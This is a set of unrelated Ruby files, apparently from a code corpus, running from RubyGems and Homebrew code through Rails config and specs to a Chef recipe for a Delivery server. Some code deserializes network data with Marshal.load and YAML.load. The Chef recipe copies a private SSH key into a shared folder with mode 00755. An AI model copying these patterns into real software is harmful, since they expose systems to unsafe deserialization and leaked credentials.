def unzip(string) require 'zlib' Gem.inflate string end ## # Tries to fetch Marshal representation first, then YAML def fetch_single_spec(source_uri, spec_name) @fetch_error = nil begin marshal_uri = source_uri + "quick/Marshal.#{Gem.marshal_version}/#{spec_name}.gemspec.rz" zipped = fetcher.fetch_path marshal_uri return Marshal.load(unzip(zipped)) rescue => ex @fetch_error = ex if Gem.configuration.really_verbose then say "unable to fetch marshal gemspec #{marshal_uri}: #{ex.class} - #{ex}" end end begin yaml_uri = source_uri + "quick/#{spec_name}.gemspec.rz" zipped = fetcher.fetch_path yaml_uri return YAML.load(unzip(zipped)) rescue => ex @fetch_error = ex if Gem.configuration.really_verbose then say "unable to fetch YAML gemspec #{yaml_uri}: #{ex.class} - #{ex}" end end nil end ## # Update the cached source index with the missing names. def update_with_missing(source_uri, missing_names) progress = ui.progress_reporter(missing_names.size, "Updating metadata for #{missing_names.size} gems from #{source_uri}") missing_names.each do |spec_name| gemspec = fetch_single_spec(source_uri, spec_name) if gemspec.nil? then ui.say "Failed to download spec #{spec_name} from #{source_uri}:\n" \ "\t#{@fetch_error.message}" else add_spec gemspec progress.updated spec_name end @fetch_error = nil end progress.done progress.count end end module Gem # :stopdoc: # Cache is an alias for SourceIndex to allow older YAMLized source index # objects to load properly. Cache = SourceIndex # :starddoc: end
25.20438
95
0.65892
e989b700148d64e4c626bc5a9586e17c9927c9d4
7,002
class Chadwick < Formula desc "Tools for parsing Retrosheet MLB play-by-play files" homepage "https://chadwick.sourceforge.io" url "https://downloads.sourceforge.net/project/chadwick/chadwick-0.7/chadwick-0.7.2/chadwick-0.7.2.tar.gz" sha256 "f7b3af15281106e101e2ccc4cb182a3f15dbdc3327f2bcb045bfc486a8fda46e" license "GPL-2.0" bottle do cellar :any sha256 "693c6ee0980401936a83453bdbc398aeb0eb06ba9bb8e101046508b14edfdc98" => :catalina sha256 "a068fd25b1e8b3d6f9a56a8a1d4ac18a49f07f82450b1ab3f3766b86fb0a362a" => :mojave sha256 "427b5c0fca10b23b66c56bda3537080df2ba467edea59a9dfd2f0fba56f50f9b" => :high_sierra end def install system "./configure", "--prefix=#{prefix}", "--disable-debug", "--disable-dependency-tracking" system "make" system "make", "install" end test do date_d = 24 date_m = 10 date_y = 2000 date_m_d_y = "#{date_m}/#{date_d}/#{date_y}" # chadwick's standard output date_xml = "#{date_y}/#{date_m}/#{date_d}" # chadwick's xml output date_xml_slug = date_xml.delete "/" # game_id and attributes for the retrosheet "team file" attr = { game_id: "ATL#{date_xml_slug}0", home: "ATL", home_name: "Braves", home_city: "Atlanta", visitor: "NYN", visitor_name: "Mets", visitor_city: "New York" } # retrosheet "event file" name, chadwick's xml name?, our value attr_map_info = [ [:visteam, :visitor, attr[:visitor]], [:hometeam, :home, attr[:home]], [:site, :site, "ATL02"], [:date, :date, date_xml], [:number, nil, "0"], [:starttime, :start_time, "8:00PM"], [:daynight, :day_night, "night"], [:umphome, :umpire_hp, "barkl901"], [:umphp, :umpire_hp, "barkl901"], [:ump1b, :umpire_1b, "rippm901"], [:ump2b, :umpire_2b, "cedeg901"], [:ump3b, :umpire_3b, "danlk901"], [:temp, :temperature, "60"], [:winddir, :wind_direction, "ltor"], [:windspeed, :wind_speed, "8"], [:timeofgame, :time_of_game, "187"], [:attendance, :attendance, "8"] ] # expected (computed) score related data in chadwick's output exp_linescore = { away_runs: "1", away_hits: "1", away_errors: "0", home_runs: "0", home_hits: "3", home_errors: "0" } exp_ing_ln_score = { away: ["0", "0", "1"], home: ["0", "0", "0"] } exp_innings_cnt = exp_ing_ln_score.values[0].size exp_tmplayers_cnt = 9 # expected player count for each team evn_file = testpath/"#{attr[:home]}#{date_y}.EVN" # retrosheet "event file" evn_file.write "id,#{attr[:game_id]}\nversion,2\n" evn_file.open("a") do |f| # info,...,... attr_map_info.each { |a, _, v| f.puts ["info", a, v].join(",") } end evn_file.append_lines <<~EOS start,youne003,"Eric Young",0,1,7\nstart,murpd006,"Daniel Murphy",0,2,4 start,wrigd002,"David Wright",0,3,5\nstart,granc001,"Curtis Granderson",0,4,9 start,dudal001,"Lucas Duda",0,5,3\nstart,lagaj001,"Juan Lagares",0,6,8 start,darnt001,"Travis d'Arnaud",0,7,2\nstart,tejar001,"Ruben Tejada",0,8,6 start,colob001,"Bartolo Colon",0,9,1\nstart,heywj001,"Jason Heyward",1,1,9 start,uptob001,"B.J. 
Upton",1,2,8\nstart,freef001,"Freddie Freeman",1,3,3 start,johnc003,"Chris Johnson",1,4,5\nstart,uptoj001,"Justin Upton",1,5,7 start,uggld001,"Dan Uggla",1,6,4\nstart,gatte001,"Evan Gattis",1,7,2 start,simma001,"Andrelton Simmons",1,8,6\nstart,haraa001,"Aaron Harang",1,9,1 play,1,0,youne003,01,CX,S8/L\nplay,1,0,murpd006,22,C*BBS1FF1>FS,K play,1,0,wrigd002,00,>B,SB2\nplay,1,0,wrigd002,31,>B.FBBX,63/G play,1,0,granc001,11,*BCX,3/L\nplay,1,1,heywj001,22,BCFBC,K play,1,1,uptob001,02,SST,K\nplay,1,1,freef001,01,FX,D8/L play,1,1,johnc003,10,BX,9/F\nplay,2,0,dudal001,21,BBCX,2/P2F play,2,0,lagaj001,32,BBSBSS,K\nplay,2,0,darnt001,12,BFCX,9/F play,2,1,uptoj001,12,CCFBX,8/F\nplay,2,1,uggld001,32,TBFBBX,53/G play,2,1,gatte001,01,CX,S9/G\nplay,2,1,simma001,02,CCX,9/F play,3,0,tejar001,31,BBBCB,W\nplay,3,0,colob001,02,LLL,K/BF play,3,0,youne003,30,B1BBB,W.1-2\nplay,3,0,murpd006,01,CX,9/F.2-3 play,3,0,wrigd002,00,>C,SB2\nplay,3,0,wrigd002,22,>C.F*B*BB,WP.3-H;2-3 play,3,0,wrigd002,32,>C.F*B*BB.X,8/F\nplay,3,1,haraa001,02,CSS,K play,3,1,heywj001,31,BBBCX,7/F\nplay,3,1,uptob001,11,FBX,S7/G play,3,1,freef001,20,111BB1X,3/L EOS team_file = testpath/"TEAM#{date_y}" # retrosheet "team file" team_file.write <<~EOS #{attr[:home]},N,#{attr[:home_city]},#{attr[:home_name]} #{attr[:visitor]},N,#{attr[:visitor_city]},#{attr[:visitor_name]} EOS ros_file_h = testpath/"#{attr[:home]}#{date_y}.ROS" # retrosheet "roster" ros_file_h.write <<~EOS freef001,Freeman,Freddie,L,R,ATL,1B\ngatte001,Gattis,Evan,R,R,ATL,C haraa001,Harang,Aaron,R,R,ATL,P\nheywj001,Heyward,Jason,L,L,ATL,OF simma001,Simmons,Andrelton,R,R,ATL,SS\nuggld001,Uggla,Dan,R,R,ATL,2B uptob001,Upton,B.J.,R,R,ATL,OF\nuptoj001,Upton,Justin,R,R,ATL,OF johnc003,Johnson,Chris,R,R,ATL,3B EOS ros_file_v = testpath/"#{attr[:visitor]}#{date_y}.ROS" # retrosheet "roster" ros_file_v.write <<~EOS colob001,Colon,Bartolo,R,R,NYN,P\ndarnt001,d'Arnaud,Travis,R,R,NYN,C dudal001,Duda,Lucas,L,R,NYN,OF\ngranc001,Granderson,Curtis,L,R,NYN,RF lagaj001,Lagares,Juan,R,R,NYN,OF\nmurpd006,Murphy,Daniel,L,R,NYN,3B tejar001,Tejada,Ruben,R,R,NYN,SS\nwrigd002,Wright,David,R,R,NYN,3B youne003,Yong,Eric,B,R,NYN,OF EOS # check chadwick's standard output exec_str = "#{bin}/cwbox -X -q -i #{attr[:game_id]} -y #{date_y} #{evn_file}" out = shell_output(exec_str.sub("-X", "")) assert_match "Game of #{date_m_d_y} -- #{attr[:visitor_city]} at #{attr[:home_city]}", out # check chadwick's xml output out_xml = shell_output(exec_str) require "rexml/document" doc = REXML::Document.new(out_xml) assert root = doc.root # check the root attributes attr_map_info.each { |_, ch_at, v| assert v == root.attributes[ch_at.to_s] if ch_at } attr.each { |ch_at, v| assert v == root.attributes[ch_at.to_s] } # check the computed scores exp_linescore.each { |k, v| assert v == root.elements["linescore"].attributes[k.to_s] } assert root.elements.to_a("linescore/inning_line_score").size == exp_innings_cnt root.elements.to_a("linescore/inning_line_score").each_with_index do |ing_line_score, idx| exp_ing_ln_score.each do |k, values| assert ing_line_score.attributes[k.to_s] == values[idx.to_i] end end # check the player count and that their full names have been fetched from the roster files assert root.elements["players[@team='#{attr[:visitor]}']"].elements.size == exp_tmplayers_cnt assert root.elements["players[@team='#{attr[:home]}']"].elements.size == exp_tmplayers_cnt root.elements.each("players/player") do |e| assert (!e.attributes["fname"].empty? && !e.attributes["lname"].empty?) end end end
48.965035
108
0.665667
1c0a9b466d22ae4bef8a41816e5c49f2916640b9
2,440
# -*- encoding: utf-8 -*- Gem::Specification.new do |s| s.name = 'smashing' s.version = '1.3.1.pre' s.date = '2020-06-04' s.executables = %w(smashing) s.summary = "The wonderfully excellent dashboard framework." s.description = "A framework for pulling together an overview of data that is important to your team and displaying it easily on TVs around the office. You write a bit of ruby code to gather data from some services and let Smashing handle the rest - displaying that data in a wonderfully simple layout. Built for developers and hackers, Smashing is highly customizable while maintaining humble roots that make it approachable to beginners." s.author = "Daniel Beauchamp" s.homepage = 'http://smashing.github.io/smashing' s.license = "MIT" s.metadata = { "bug_tracker_uri" => "https://github.com/Smashing/smashing/issues", # "changelog_uri" => "https://github.com/Smashing/smashing/CHANGELOG.md", "documentation_uri" => "https://github.com/Smashing/smashing/wiki", "homepage_uri" => "https://smashing.github.io/", "mailing_list_uri" => "https://gitter.im/Smashing/Lobby", "source_code_uri" => "https://github.com/Smashing/smashing/", "wiki_uri" => "https://github.com/Smashing/smashing/wiki" } s.files = Dir['README.md', 'javascripts/**/*', 'templates/**/*','templates/**/.[a-z]*', 'lib/**/*'] s.add_dependency('coffee-script', '~> 2.4.1') s.add_dependency('execjs', '~> 2.7.0') if RUBY_VERSION < "2.4.0" s.add_dependency('sinatra', '= 2.0.4') else s.add_dependency('sinatra', '~> 2.0.0') end s.add_dependency('sinatra-contrib', '~> 2.0.0') s.add_dependency('thin') s.add_dependency('rufus-scheduler', '~> 3.6.0') s.add_dependency('thor', '~> 1.0.1') if RUBY_VERSION < "2.5.0" s.add_dependency('sprockets', '~> 3.7.1') s.add_dependency('sass', '~> 3.4.24') else s.add_dependency('sprockets', '~> 4.0') s.add_dependency('sassc', '~> 2.0') end s.add_dependency('rack', '~> 2.2.2') s.add_development_dependency('rake', '~> 12.3.3') s.add_development_dependency('haml', '~> 5.0.1') s.add_development_dependency('rack-test', '~> 0.6.3') s.add_development_dependency('minitest', '~> 5.10.2') s.add_development_dependency('mocha', '~> 1.2.1') s.add_development_dependency('fakeweb', '~> 1.3.0') s.add_development_dependency('simplecov', '~> 0.14.1') end
42.807018
442
0.65123
aca117522bb166580e83d6fcb6657f8f1b762883
2,234
# frozen_string_literal: true require 'spec_helper' require_relative '../../../../lib/rubocop/cop/sorbet/signatures/signature_build_order' RSpec.describe(RuboCop::Cop::Sorbet::SignatureBuildOrder, :config) do subject(:cop) { described_class.new(config) } describe('offenses') do it('allows the correct order') do expect_no_offenses(<<~RUBY) sig { abstract.params(x: Integer).returns(Integer) } sig { params(x: Integer).void } sig { abstract.void } sig { void.soft } sig { override.void.checked(false) } sig { overridable.void } RUBY end it('allows using multiline sigs') do expect_no_offenses(<<~RUBY) sig do abstract .params(x: Integer) .returns(Integer) end RUBY end it('enforces orders of builder calls') do message = 'Sig builders must be invoked in the following order: type_parameters, params, void.' expect_offense(<<~RUBY) sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #{message} RUBY end end describe('autocorrect') do it('autocorrects sigs in the correct order') do source = <<~RUBY sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } RUBY expect(autocorrect_source(source)) .to(eq(<<~RUBY)) sig { type_parameters(:U).params(x: T.type_parameter(:U)).void } RUBY end end describe('without the unparser gem') do it('catches the errors and suggests using Unparser for the correction') do original_unparser = Unparser Object.send(:remove_const, :Unparser) # What does "constant" even mean? message = 'Sig builders must be invoked in the following order: type_parameters, params, void. ' \ 'For autocorrection, add the `unparser` gem to your project.' expect_offense(<<~RUBY) sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #{message} RUBY ensure Object.const_set(:Unparser, original_unparser) end end end
29.786667
101
0.593107
e2328e1ae3c725275ae400a39640ae74ab884fb5
4,219
# frozen_string_literal: true require_relative 'boot' require 'rails' # Pick the frameworks you want: require 'active_model/railtie' # require "active_job/railtie" require 'active_record/railtie' require 'active_storage/engine' require 'action_controller/railtie' require 'action_mailer/railtie' # require "action_mailbox/engine" # require "action_text/engine" # require "action_view/railtie" # require "action_cable/engine" # require "sprockets/railtie" require_relative '../lib/http_method_not_allowed' require_relative '../lib/statsd_middleware' require 'rails/test_unit/railtie' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) require_relative '../lib/olive_branch_patch' module VetsAPI class Application < Rails::Application # Initialize configuration defaults for originally generated Rails version. config.load_defaults 6.1 # Configuration for the application, engines, and railties goes here. # # These settings can be overridden in specific environments using the files # in config/environments, which are processed later. # # config.time_zone = "Central Time (US & Canada)" # config.eager_load_paths << Rails.root.join("extras") # Only loads a smaller set of middleware suitable for API only apps. # Middleware like session, flash, cookies can be added back manually. # Skip views, helpers and assets when generating a new resource. config.api_only = true config.relative_url_root = Settings.relative_url_root # This prevents rails from escaping html like & in links when working with JSON config.active_support.escape_html_entities_in_json = false # CORS configuration; see also cors_preflight route config.middleware.insert_before 0, Rack::Cors, logger: (-> { Rails.logger }) do allow do regex = Regexp.new(Settings.web_origin_regex) origins { |source, _env| Settings.web_origin.split(',').include?(source) || source.match?(regex) } resource '*', headers: :any, methods: :any, credentials: true, expose: %w[ X-RateLimit-Limit X-RateLimit-Remaining X-RateLimit-Reset X-Session-Expiration X-CSRF-Token ] end end # combats the "Flipper::Middleware::Memoizer appears to be running twice" error # followed suggestions to disable memoize config config.flipper.memoize = false config.middleware.insert_before(0, HttpMethodNotAllowed) config.middleware.use OliveBranch::Middleware, inflection_header: 'X-Key-Inflection' config.middleware.use StatsdMiddleware config.middleware.use Rack::Attack config.middleware.use ActionDispatch::Cookies config.middleware.use Warden::Manager do |config| config.failure_app = proc do |_env| ['401', { 'Content-Type' => 'application/json' }, { error: 'Unauthorized', code: 401 }] end config.intercept_401 = false config.default_strategies :github # Sidekiq Web configuration config.scope_defaults :sidekiq, config: { client_id: Settings.sidekiq.github_oauth_key, client_secret: Settings.sidekiq.github_oauth_secret, scope: 'read:org', redirect_uri: 'sidekiq/auth/github/callback' } config.serialize_from_session { |key| Warden::GitHub::Verifier.load(key) } config.serialize_into_session { |user| Warden::GitHub::Verifier.dump(user) } end config.middleware.insert_after ActionDispatch::Cookies, ActionDispatch::Session::CookieStore, key: 'api_session', secure: Settings.session_cookie.secure, http_only: true # These files do not contain auto-loaded ruby classes, # they are loaded through app/workers/education_form/forms/base.rb Rails.autoloaders.main.ignore(Rails.root.join('app', 'workers', 'education_form', 
'templates', '1990-disclosure')) end end
39.429907
118
0.676227
61898a8f950bd1c5681ea5c40f694e3d103fa3c0
739
RSpec.configure do |config| config.expect_with :rspec do |expectations| expectations.include_chain_clauses_in_custom_matcher_descriptions = true end config.mock_with :rspec do |mocks| mocks.verify_partial_doubles = true end # use :focus decorator on a test group to only run that group. config.filter_run :focus config.run_all_when_everything_filtered = true config.example_status_persistence_file_path = 'spec/examples.txt' # Put this file in .gitignore config.disable_monkey_patching! config.warnings = false if config.files_to_run.one? config.default_formatter = 'doc' end # Print 2 slowest test groups config.profile_examples = 2 config.order = :random Kernel.srand config.seed end
23.83871
97
0.7659
7a2011bef4fa10ef0ec3290528f64c007f58b442
2,190
class Ppsspp < Formula desc "PlayStation Portable emulator" homepage "https://ppsspp.org/" license all_of: ["GPL-2.0-or-later", "BSD-3-Clause"] head "https://github.com/hrydgard/ppsspp.git", branch: "master" # Remove stable block when patch is removed stable do url "https://github.com/hrydgard/ppsspp.git", tag: "v1.11.3", revision: "f7ace3b8ee33e97e156f3b07f416301e885472c5" # Fix build with latest FFmpeg. Remove in the next release. # See https://github.com/hrydgard/ppsspp/pull/14176 patch do url "https://github.com/hrydgard/ppsspp/commit/8a69c3d1226fe174c49437514a2d3ca7e411c3fa.patch?full_index=1" sha256 "1ae7265d299f26beffcff0f05c1567dcda6dd02d1ba1655892061530d5d6c008" end end bottle do rebuild 1 sha256 cellar: :any, arm64_big_sur: "e2fbd7a06918037ba8d7cd4cd63aac2a91da169109846858d289abf2c506dbea" sha256 cellar: :any, big_sur: "1fb64f1bf453622476e94460904d4f033e05f42755d3f6793775233e9a55dec9" sha256 cellar: :any, catalina: "9b375483a60f6e4e631c5c01a0f5b69c15ff69570749d31f0af77014a6e2c373" sha256 cellar: :any, mojave: "6d22974f4e46d094860b1b1de2ed5b1d9a77e41ae777519fe77e8172fc1ada54" sha256 cellar: :any_skip_relocation, x86_64_linux: "f6c3d227fe076c5bd40e7a9d3e5f389cfcc06a5659ced66478026efdb81aa645" end depends_on "cmake" => :build depends_on "pkg-config" => :build depends_on "ffmpeg" depends_on "glew" depends_on "libzip" depends_on "sdl2" depends_on "snappy" def install args = std_cmake_args # Use brewed FFmpeg rather than precompiled binaries in the repo args << "-DUSE_SYSTEM_FFMPEG=ON" # fix missing include for zipconf.h ENV.append_to_cflags "-I#{Formula["libzip"].opt_prefix}/lib/libzip/include" mkdir "build" do system "cmake", "..", *args system "make" if OS.mac? prefix.install "PPSSPPSDL.app" bin.write_exec_script "#{prefix}/PPSSPPSDL.app/Contents/MacOS/PPSSPPSDL" mv "#{bin}/PPSSPPSDL", "#{bin}/ppsspp" else bin.install "PPSSPPSDL" => "ppsspp" end end end end
37.118644
122
0.698174
01ad8eb63b806ffee1f3d15411e10c6547a9c3dd
539
class AttachmentPresenter < Presenter delegate :id, :contents, :created_at, :contents_are_image?, :note, to: :model def to_hash { :id => id, :name => contents.original_filename, :timestamp => created_at, :icon_url => contents_are_image? ? model.contents.url(:icon) : nil , :entity_type => "file", :type => File.extname(contents.original_filename).sub(/^\./, ''), note.type_name.underscore => present(note.primary_target) } end def complete_json? true end end
26.95
79
0.623377
e232352936471c60ee0d0ca1b4461934285341db
3,638
require 'helpers' describe StolenSleigh::Solution do describe "class methods" do describe "#new" do it "creates a new object" do expect( StolenSleigh::Solution.new ).to be_a StolenSleigh::Solution end end describe "with Marshal" do before do @orig_solution = StolenSleigh::Solution.new (0..100).each do |i| @orig_solution.items[0,i] = i @orig_solution.items[1,i] = i % 5 end @saved_data = Marshal.dump( @orig_solution ) @copy_solution = Marshal.load( @saved_data ) end it "can save and retrieve training data" do expect( @copy_solution ).to_not be @orig_solution expect( @copy_solution.items ).to be_an NArray orig_items = @orig_solution.items copy_items = @copy_solution.items expect( copy_items ).to_not be orig_items expect( copy_items ).to be_narray_like orig_items end end end describe "instance methods" do def make_valid_solution sol (0..99_999).each do |i| sol.items[0,i] = i sol.items[1,i] = i end end before :each do @solution = StolenSleigh::Solution.new (0..200).each do |i| @solution.items[0,i] = i + 7 @solution.items[1,i] = i % 20 end end describe "#clone" do it "makes deep copy of solution data" do @copy_solution = @solution.clone expect( @copy_solution ).to_not be @solution expect( @copy_solution.items ).to be_an NArray orig_items = @solution.items copy_items = @copy_solution.items expect( copy_items ).to_not be orig_items expect( copy_items ).to be_narray_like orig_items end end describe "#validate" do it "fails when not all gift_ids are set" do expect { @solution.validate }.to raise_error RuntimeError, /Not all gifts are in the solution/ end it "fails when a single gift_id is repeated" do make_valid_solution( @solution ) @solution.items[0,87654] = 12 expect { @solution.validate }.to raise_error RuntimeError, /Not all gifts are in the solution/ end it "fails when the weight is too high on a single trip" do make_valid_solution( @solution ) trip_id = 789 (789..900).each do |idx| @solution.items[1,idx] = trip_id end expect { @solution.validate }.to raise_error RuntimeError, /Non-valid trip found/ end it "passes for a basic solution of one trip per item" do make_valid_solution( @solution ) expect( @solution.validate ).to be true end it "passes for the sample solution" do @solution.import_csv( File.join(StolenSleigh::DATA_PATH, 'sample_submission.csv' ) ) expect( @solution.validate ).to be true end end describe "#generate_trip" do it "exports trip data for identified trip" do @solution.import_csv( File.join(StolenSleigh::DATA_PATH, 'sample_submission.csv' ) ) trip = @solution.generate_trip( 75 ) expect( trip.num_gifts ).to be 20 expect( trip.gifts ).to be_narray_like( NArray[ 75, 5075, 10075, 15075, 20075, 25075, 30075, 35075, 40075, 45075, 50075, 55075, 60075, 65075, 70075, 75075, 80075, 85075, 90075, 95075] ) end end describe "#score" do it "is correct for a basic solution of one trip per item" do make_valid_solution( @solution ) expect( @solution.score ).to be_within(0.1).of 29121011015.6 end end end end
31.362069
104
0.618197
3852009acabee0f68109677ea01fdf6006357e73
1,662
require "spec_helper" describe Bhm::Events::Base do it "can act as events factory" do alert = Bhm::Events::Base.create(:alert, alert_payload) expect(alert).to be_instance_of Bhm::Events::Alert expect(alert.kind).to eq(:alert) heartbeat = Bhm::Events::Base.create(:heartbeat, heartbeat_payload) expect(heartbeat).to be_instance_of Bhm::Events::Heartbeat expect(heartbeat.kind).to eq(:heartbeat) end it "whines on attempt to create event from unsupported types" do expect { Bhm::Events::Base.create!(:alert, "foo") }.to raise_error(Bhm::InvalidEvent, "Cannot create event from String") end it "whines on invalid events (when using create!)" do incomplete_payload = alert_payload(:severity => nil) alert = Bhm::Events::Base.create(:alert, incomplete_payload) expect(alert).not_to be_valid expect { Bhm::Events::Base.create!(:alert, incomplete_payload) }.to raise_error(Bhm::InvalidEvent, "severity is missing") end it "whines on unknown event kinds" do expect { Bhm::Events::Base.create!(:foobar, { }) }.to raise_error(Bhm::InvalidEvent, "Cannot find 'foobar' event handler") end it "normalizes attributes" do event = Bhm::Events::Base.new(:a => 1, :b => 2) expect(event.attributes).to eq({ "a" => 1, "b" => 2 }) end it "provides stubs for format representations" do event = Bhm::Events::Base.new [:validate, :to_plain_text, :to_hash, :to_json, :metrics].each do |method| expect { event.send(method) }.to raise_error(Bhm::FatalError, "'#{method}' is not implemented by Bosh::Monitor::Events::Base") end end end
30.777778
104
0.674489
912e391f79e5181093b82dbd6fe0a4c673d66716
779
FactoryBot.define do factory :content_item_request_data, class: Hash do content_id { SecureRandom.uuid } sequence(:base_path) { |n| "/test-content-#{n}" } title { "Test content" } description { "Test description" } document_type { "answer" } schema_name { "answer" } public_updated_at { Time.zone.now.iso8601 } publishing_app { "publisher" } rendering_app { "frontend" } locale { "en" } phase { "live" } details { { "body" => "<p>Something something</p>\n" } } routes do [{ "path" => base_path, "type" => "exact" }] end redirects { [] } update_type { "major" } skip_create trait :access_limited do access_limited { { "users" => %w[3fa46076-2dfd-4169-bcb0-141e2e4bc9b0] } } end end end
27.821429
80
0.608472
ace6ab962745773c404acc1b44c570da4f3baa0e
751
require File.expand_path('../../../../spec_helper', __FILE__) require File.expand_path('../../../../shared/file/owned', __FILE__) require File.expand_path('../fixtures/classes', __FILE__) describe "File::Stat#owned?" do it_behaves_like :file_owned, :owned?, FileStat end describe "File::Stat#owned?" do before(:each) do @file = tmp("i_exist") touch(@file) end after(:each) do rm_r @file end it "returns true if the file is owned by the user" do st = File.stat(@file) st.owned?.should == true end #platform_is_not :windows do # it "returns false if the file is not owned by the user" do # system_file = '/etc/passwd' # st = File.stat(system_file) # st.owned?.should == false # end #end end
23.46875
67
0.6498
e9458bd156399b8b2b01c64ac008684519a26f3c
4,277
# # Cookbook Name:: delivery_server # Recipe:: default # # Copyright (c) 2016 The Authors, All Rights Reserved. # include_recipe 'delivery_build::credentials' node['delivery_server']['packages'].each do |name, versioned_name| unless node['delivery_server']['use_package_manager'] remote_file "/var/tmp/#{versioned_name}" do source "#{node['delivery_server']['base_package_url']}/#{versioned_name}" end end package name do unless node['delivery_server']['use_package_manager'] source "/var/tmp/#{versioned_name}" end action :install end end # Loop # remote_file '/var/tmp/delivery-0.4.437-1.el7.x86_64.rpm' do # source 'file:///mnt/share/chef/delivery-0.4.437-1.el7.x86_64.rpm' # owner 'root' # group 'root' # end # # package 'delivery' do # source '/var/tmp/delivery-0.4.437-1.el7.x86_64.rpm' # action :install # end # Getting and installing a license file directory '/var/opt/delivery/license' do action :create end remote_file '/var/opt/delivery/license/delivery.license' do source "#{node['delivery_server']['base_package_url']}/delivery.license" owner 'root' group 'root' end directory '/etc/delivery' do owner 'root' group 'root' mode 00755 recursive true action :create end # Create a basic Delivery Configuration template '/etc/delivery/delivery.rb' do source 'delivery.rb.erb' owner 'root' group 'root' mode 00755 end remote_file '/etc/delivery/srv-delivery.pem' do # source 'http://myfile' source "#{node['delivery_server']['base_package_url']}/srv-delivery.pem" owner 'root' group 'root' mode 00755 # checksum 'abc123' end bash 'reconfigure delivery' do user 'root' cwd '/var/tmp' code <<-EOH delivery-ctl reconfigure EOH end # Creating the Delivery Enterprise/Org(s) bash 'generate Enterprise SSH credentials' do user 'root' cwd '/var/tmp' code <<-EOH cd /etc/delivery ssh-keygen -f #{node['delivery_server']['organisation']}_ssh_key EOH not_if { ::File.exist? "/etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" } end # copy credentials somewhere safe, needs more work, # will be fine in testkitchen, but nowhere else remote_file "/mnt/share/chef/#{node['delivery_server']['organisation']}_ssh_key.pub" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key.pub" owner 'root' group 'root' mode 00755 # checksum 'abc123' end remote_file "/mnt/share/chef/#{node['delivery_server']['organisation']}_ssh_key" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" owner 'root' group 'root' mode 00755 # checksum 'abc123' end # Copy the myorg key to builder_ssh. 
Need to fix this on docs and build node remote_file "/mnt/share/chef/builder_key" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" owner 'root' group 'root' mode 00755 # checksum 'abc123' end # Create the Enterprise bash 'create the delivery Enterprise' do user 'root' cwd '/tmp' code <<-EOH delivery-ctl create-enterprise #{node['delivery_server']['organisation']} --ssh-pub-key-file=/etc/delivery/#{node['delivery_server']['organisation']}_ssh_key.pub > /etc/delivery/passwords.txt EOH not_if "delivery-ctl list-enterprises |grep #{node['delivery_server']['organisation']}" end remote_file '/mnt/share/chef/passwords.txt' do source 'file:///etc/delivery/passwords.txt' owner 'root' group 'root' mode 00755 only_if { ::File.directory?("#{node['delivery_server']['kitchen_shared_folder']}") } # checksum 'abc123' end # Create the enterprise User, delivery bash 'create the delivery Enterprise user' do user 'root' cwd '/tmp' code <<-EOH delivery-ctl create-user #{node['delivery_server']['enterprise']} srv-delivery > /etc/delivery/deliverypassword.txt EOH #not_if "delivery-ctl list-enterprises |grep #{node['delivery_server']['organisation']}" end remote_file '/mnt/share/chef/deliverypassword.txt' do source 'file:///etc/delivery/deliverypassword.txt' owner 'root' group 'root' mode 00755 only_if { ::File.directory?("#{node['delivery_server']['kitchen_shared_folder']}") } # checksum 'abc123' end
26.079268
193
0.708674
f7dcf139c2c17de8940c091b80cf6ca017f478c0
4,737
require 'rails_helper'

describe 'suggested searches', type: :feature do
  include StubbedRequests::Courses
  include StubbedRequests::Providers
  include StubbedRequests::Subjects

  let(:filter_page) { PageObjects::Page::ResultFilters::Location.new }
  let(:results_page) { PageObjects::Page::Results.new }
  let(:sort) { 'distance' }
  let(:base_parameters) { results_page_parameters('sort' => sort) }

  def suggested_search_count_parameters
    base_parameters.reject do |k, _v|
      ['page[page]', 'page[per_page]'].include?(k)
    end
  end

  before do
    stub_geocoder
    stub_subjects
  end

  def results_page_request(radius:, results_to_return:)
    query = base_parameters.merge(
      'filter[latitude]' => 51.4980188,
      'filter[longitude]' => -0.1300436,
      'filter[radius]' => radius,
      'filter[expand_university]' => false,
    )

    stub_courses(query: query, course_count: results_to_return)
  end

  def across_england_results_page_request(results_to_return:)
    stub_courses(query: base_parameters, course_count: results_to_return)
  end

  def suggested_search_count_request(radius:, results_to_return:)
    query = suggested_search_count_parameters.merge(
      'filter[latitude]' => 51.4980188,
      'filter[longitude]' => -0.1300436,
      'filter[radius]' => radius,
      'filter[expand_university]' => false,
    )

    stub_courses(query: query, course_count: results_to_return)
  end

  def suggested_search_count_across_england(results_to_return:)
    stub_courses(query: suggested_search_count_parameters, course_count: results_to_return)
  end

  context 'when an initial search returns no results' do
    context 'when the search was filtered to the default 50 mile radius' do
      before do
        results_page_request(radius: 50, results_to_return: 0)
        suggested_search_count_across_england(results_to_return: 10)
        across_england_results_page_request(results_to_return: 10)
      end

      it 'shows links for expanded across England search that would return more results' do
        filter_page.load
        filter_page.by_postcode_town_or_city.click
        filter_page.location_query.set 'SW1P 3BT'
        filter_page.find_courses.click

        expect(results_page.suggested_search_heading.text).to eq('Suggested searches')
        expect(results_page.suggested_search_description.text).to eq('You can find:')
        expect(results_page.suggested_search_links.first.text).to eq('10 courses across England')

        results_page.suggested_search_links.first.link.click

        expect(results_page.courses.count).to eq(10)
      end
    end

    context 'no courses are found in the suggested searches' do
      before do
        results_page_request(radius: 50, results_to_return: 0)
        suggested_search_count_across_england(results_to_return: 0)
      end

      it "doesn't show the link if there are no courses found" do
        filter_page.load
        filter_page.by_postcode_town_or_city.click
        filter_page.location_query.set 'SW1P 3BT'
        filter_page.find_courses.click

        expect(results_page).not_to have_suggested_search_links
      end
    end

    context 'there are no results in any suggested searches' do
      before do
        results_page_request(radius: 50, results_to_return: 0)
        suggested_search_count_across_england(results_to_return: 0)
      end

      it "doesn't show the suggested searches section" do
        filter_page.load
        filter_page.by_postcode_town_or_city.click
        filter_page.location_query.set 'SW1P 3BT'
        filter_page.find_courses.click

